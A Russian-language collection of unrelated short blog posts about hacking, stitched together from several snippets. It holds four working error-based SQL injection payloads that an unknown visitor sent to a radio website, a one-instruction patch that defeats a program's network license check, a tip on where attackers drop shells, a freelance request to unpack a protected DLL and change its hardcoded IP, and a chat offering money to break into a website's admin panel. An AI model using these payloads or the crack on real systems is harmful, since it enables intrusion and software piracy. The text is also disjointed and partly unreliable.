to post messages and comments.

Тут к нам на сайт радио намедни заходил кто-то. Хотел чего-то. Декодированные QUERY_STRING:

?lang=RU and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

?lang=RU and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

?page=news and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

?page=news and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

Аж, даже, жалко товарища стало. Ведь на странице "о радио" прямым текстом сказано: "В качестве "базы данных" используется просто файловая система." А он мучался, параметры подбирал... :)

Остаётся надеяться, что это был просто тупой бот, нашедший нас в каком-нибудь гугеле. Не могли же "хакiры" настолько измельчать?

Восстанавливаю доступ к Яндексу. Отправила им фото себя с паспортом, мне в ответ прислали длинное письмо, в т.ч. там есть:
Для установки новых пароля и контрольного вопроса/ответа нажмите на ссылку:
Вот только ссылку они НЕ ПРИЛОЖИЛИ.

Ой, как интересно!
Обращаем Ваше внимание, что платёж, который Вы оспариваете, зачислен на профессиональный счёт. Вы можете подать жалобу владельцу счёта.
Подробнее о том, как подать жалобу, Вы можете узнать здесь:
money.yandex.ru

Если владелец счёта после жалобы откажется возвращать деньги, Вы можете пройти процедуру идентификации, и мы предоставим Вам данные владельца счёта, на который ушли деньги, чтобы Вы могли обратиться в суд.
О том, как пройти идентификацию, можно прочитать на нашем сайте:
money.yandex.ru

Я спокойна. Я совершенн спокойна. Мне просто невыносимо хочется убивать.
Ночью с моего Якошелька вывели все деньги, собранные за вчера на матильду.
Сейчас буду менять пароли во всех системах, но как же я временами ненавижу людей и этот мир вообще...

мозга учусь летать,вот как взломать свой мозг,чтоб искреннее поверить ,что шагнув с возвышеннути я останусь висеть в воздухе,а не упаду вниз

ВНЕЗАПНО!!!!! Взломали мою учётку на одноклассниках. МОЮ, БЛЯТЬ!!! КАК????? Пароли от 8 до 20 символов. Kaspersky Internet Security — всегда обновлённые базы. За семь лет ни одного взлома, ни одного заражения. Это невозможно!

Проект на фри-ланс.ру: free-lance.ru

Распаковать dll (Themida)

1. Распаковать dll
2. Изменить ip адрес (93.190.143.190) на тот который необходим
3. Запаковать обратно
4. Сделать инструкцию как менять впредь

Шикарно! Особенно с бюджетом в 1000 р. и плашкой "Данный бюджет рассчитан на исполнителей низкого класса".

Цимес в том, что полноценно Фемиду (упаковщик/протектор) вскрыли только однажды, старую вторую версию и то — сумасшедшие китайцы. Так что даже распаковать-поменять-запаковать обратно — уже проблема далеко не на тридцатник Евро. А про "инструкцию как менять впредь" вообше речи быть не может без полного курса реверсинга. :)

Неужто WoT был взломан? Администрация так настаивает на смене паролей, даже акцию соответствующую организовали... Что-то здесь не чисто...

Голая Скарлет Йохансон.
Неизвестный хакер скачал с iPhone Скарлет Йохансон, её фото в голом виде, которые она, не как звезда Голливуда, имеющая возможность воспользоваться услугами отличного фотографа, а как обычная симпатичная девушка, втихаря, и конечно не для широкого просмотра, делала себе сама на память.
Наивно доверять что то личное, современной технике. iPhone — это чужие глаза, в вашем кармане.
А у меня, благодаря современным технологиям, отличные фото.

sokol-ff.livejournal.com

Нашёл новое место, кроме /tmp и /var/tmp, куда заливают эксплоиты и шеллы через дырявые скрипты — /dev/shm ;)

На хакерском конкурсе взломали MacBook, iPhone и Internet Explorer. 11 марта в канадском Ванкувере завершается пятый ежегодный конкурс Pwn2Own. В этом мероприятии принимают участие профессиональные взломщики операционных систем и браузеров, занимающиеся поиском уязвимостей в популярном программном обеспечении различных производителей. В этом году на конкурсе были успешно взломаны ноутбук MacBook Air и смартфон iPhone 4, а также смартфон BlackBerry и браузер Internet Explorer. В награду хакеры получили денежное вознаграждение, а информация о способе взлома программ была передана разработчикам ПО.

Каждый год организаторы конкурса несколько видоизменяют его программу. Так, в 2011 году было решено сосредоточить усилия хакеров на взломе браузеров. При этом программу конкурса разделили на две группы: участникам предложили взламывать отдельно компьютерные и мобильные браузеры. artsjournal.ru

Вскрытие системы защиты одной популярной софтины с проверкой ключа через сеть свелась к банальной замене:

Old=MOV AL,BYTE PTR SS:[EBP-2]
New=MOV AL,1

Я понимаю, что авторы особо и не заморачивались, но всё равно так нельзя. :(

Через дыру в ПО третьей стороны был вещи взломан официальный американский сайт компании. В течении трех часов пользователей перекидывало на фишинговую страницу, которая выглядела как Проводник WinXP с сообщениями о заражении системы.

От себя. Пока не ясно, был ли это реально взлом нашей стороны, но в целом это удар по репутации. можете глянуть на Хабре, но там концентрация долбоебов зашкаливает, при том, что комментариев пока мало. Рекомендую следить за темой на AM: anti-malware.ru Тут тоже хватает долбоебов, но важнее, что есть сотрудники (не официальные представители!) компании.

(12:13:59 AM) papa_karlo: есть сайт
(12:14:03 AM) papa_karlo: на сайте есть админка
(12:14:28 AM) papa_karlo: они готовы поспорить на 30 штук что нереально их сламать
(12:15:52 AM) papa_karlo: есть таке которые могут ебнуть его в исключительно спортивных целях?все законно как говориться.сработали бы мне 5 штук челу 25
---
.< моя голова